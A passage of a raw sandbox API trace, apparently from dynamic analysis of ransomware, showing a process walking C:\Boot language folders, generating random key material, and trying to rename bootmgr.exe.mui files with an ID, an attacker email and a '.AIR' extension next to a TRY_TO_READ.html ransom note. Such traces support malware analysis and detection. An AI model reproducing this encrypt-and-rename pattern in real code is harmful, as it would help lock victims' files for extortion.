	[0052.011] FindNextFileW (in: hFindFile=0x5753e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.011] GetLastError () returned 0x6
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54e0
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54e0 | out: hHeap=0x540000) returned 1
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.011] FindNextFileW (in: hFindFile=0x5753e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.011] GetLastError () returned 0x6
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.012] FindNextFileW (in: hFindFile=0x5753e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6fc0
	[0052.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596680
	[0052.012] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6fc0 | out: pbBuffer=0x5b6fc0) returned 1
	[0052.012] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596680 | out: pbBuffer=0x596680) returned 1
	[0052.012] SetFileAttributesW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.012] lstrlenW (lpString="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned 30
	[0052.012] GetProcessHeap () returned 0x540000
	[0052.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.012] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\\\Boot\\it-IT\\bootmgr.exe.mui"
	[0052.012] lstrcatW (in: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.012] MoveFileExW (lpExistingFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.012] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.012] GetProcessHeap () returned 0x540000
	[0052.012] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.012] CloseHandle (hObject=0xffffffff) returned 0
	[0052.012] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.012] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.012] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.012] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5530 | out: hHeap=0x540000) returned 1
	[0052.012] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5558 | out: hHeap=0x540000) returned 1
	[0052.012] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ja-JP\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575420
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.013] GetLastError () returned 0x6
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5530
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575460
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575460 | out: hHeap=0x540000) returned 1
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5530 | out: hHeap=0x540000) returned 1
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.013] FindNextFileW (in: hFindFile=0x575420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.013] GetLastError () returned 0x6
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5530
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575460
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575460 | out: hHeap=0x540000) returned 1
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5530 | out: hHeap=0x540000) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.014] FindNextFileW (in: hFindFile=0x575420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.014] GetLastError () returned 0x6
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5530
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5530 | out: hHeap=0x540000) returned 1
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.014] FindNextFileW (in: hFindFile=0x575420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.014] GetLastError () returned 0x6
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.014] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.015] FindNextFileW (in: hFindFile=0x575420, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.015] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.015] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b70c8
	[0052.015] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596690
	[0052.015] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b70c8 | out: pbBuffer=0x5b70c8) returned 1
	[0052.015] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596690 | out: pbBuffer=0x596690) returned 1
	[0052.015] SetFileAttributesW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.015] lstrlenW (lpString="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30
	[0052.015] GetProcessHeap () returned 0x540000
	[0052.015] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.015] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui"
	[0052.015] lstrcatW (in: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.015] MoveFileExW (lpExistingFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.015] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.015] GetProcessHeap () returned 0x540000
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.015] CloseHandle (hObject=0xffffffff) returned 0
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.015] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5580 | out: hHeap=0x540000) returned 1
	[0052.015] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55a8 | out: hHeap=0x540000) returned 1
	[0052.015] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ko-KR\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575460
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.016] GetLastError () returned 0x6
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5580
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5754a0
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5754a0 | out: hHeap=0x540000) returned 1
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5580 | out: hHeap=0x540000) returned 1
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.016] FindNextFileW (in: hFindFile=0x575460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.016] GetLastError () returned 0x6
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5580
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5754a0
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5754a0 | out: hHeap=0x540000) returned 1
	[0052.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5580 | out: hHeap=0x540000) returned 1
	[0052.016] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.016] FindNextFileW (in: hFindFile=0x575460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.017] GetLastError () returned 0x6
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5580
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5580 | out: hHeap=0x540000) returned 1
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.017] FindNextFileW (in: hFindFile=0x575460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.017] GetLastError () returned 0x6
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.017] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.017] FindNextFileW (in: hFindFile=0x575460, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b71d0
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5966a0
	[0052.017] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b71d0 | out: pbBuffer=0x5b71d0) returned 1
	[0052.017] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5966a0 | out: pbBuffer=0x5966a0) returned 1
	[0052.017] SetFileAttributesW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.017] lstrlenW (lpString="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30
	[0052.017] GetProcessHeap () returned 0x540000
	[0052.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.017] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui"
	[0052.017] lstrcatW (in: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
